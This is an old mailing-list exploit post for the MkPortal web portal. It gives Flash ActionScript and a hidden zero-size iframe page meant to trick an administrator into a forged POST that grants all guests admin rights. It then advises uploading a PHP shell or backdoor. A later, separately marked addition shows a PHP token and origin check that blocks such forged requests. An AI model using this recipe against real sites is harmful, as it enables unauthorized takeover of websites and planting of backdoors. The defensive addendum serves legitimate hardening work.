Date: 4 Jan 2007 04:09:19 -0000
Subject: MkPortal "All Guests are Admin" Exploit

MkPortal "All Guests are Admin" Exploit

Vulnerability discovered and exploited by: Demential
E-mail: info[at]burnhead[dot]it
Mkportal website:

Start Macromedia Flash and create an swf file with this code:

var idg:Number = 9;
var p13:Number = 1;
var Salva:String = "Save+Permissions";
getURL("", "_self", "POST");

Translate "Save+Permissions" into the language of the MKPortal site.
Example: "Salva+questi+permessi" for Italian sites.

Then upload the swf file to a webserver and create an html page like this:

<title>Put a title here</title>
<p>Put some text here</p>
<iframe src="" frameborder="0" height="0" width="0"></iframe>

Now send the HTML page to the MKPortal administrator.
When the admin opens the page, all guests will be able to administer MKPortal.

So you can go here:
and paste a php shell or a backdoor.
You can find your shell here:*.php
where * is the ID of the page.

Translate "page" into the language of the MKPortal site.
Example: "pagina" for Italian sites.
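
The permission change above succeeds because the POST is accepted on the strength of the administrator's session cookie alone. The following is an added example, not MkPortal's code and not part of the original post, of a per-session token plus same-origin check guarding such a handler; the function names, the csrf_token field and the portal.example origin are hypothetical.

```php
<?php
// Added example, not MkPortal code. All names here are hypothetical.
declare(strict_types=1);

const TRUSTED_ORIGIN = 'https://portal.example'; // placeholder for the portal's own origin

// Issue one random token per session; the admin form embeds it as a hidden field.
function csrf_issue(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a state-changing request only if it is a same-origin POST
// that carries the token bound to this session.
function csrf_check(array $server, array $post, array $session): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    // Origin (or Referer) must be the portal itself; a request with neither is refused.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($source !== TRUSTED_ORIGIN && strpos($source, TRUSTED_ORIGIN . '/') !== 0) {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // Constant-time comparison so the token cannot be recovered by timing.
    return is_string($supplied) && $expected !== '' && hash_equals($expected, $supplied);
}

// Constructed requests. The forged one carries the advisory's form fields
// but comes from another site and has no token.
$session = [];
$token   = csrf_issue($session);
$fields  = ['idg' => '9', 'p13' => '1', 'Salva' => 'Save+Permissions'];

$forged = csrf_check(
    ['REQUEST_METHOD' => 'POST', 'HTTP_REFERER' => 'https://other.example/page.html'],
    $fields, $session);
$genuine = csrf_check(
    ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => TRUSTED_ORIGIN],
    $fields + ['csrf_token' => $token], $session);

var_dump(['forged' => $forged, 'genuine' => $genuine]);
```

The handler that saves permissions would call csrf_check() before touching any group settings and return an error without saving when it fails.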
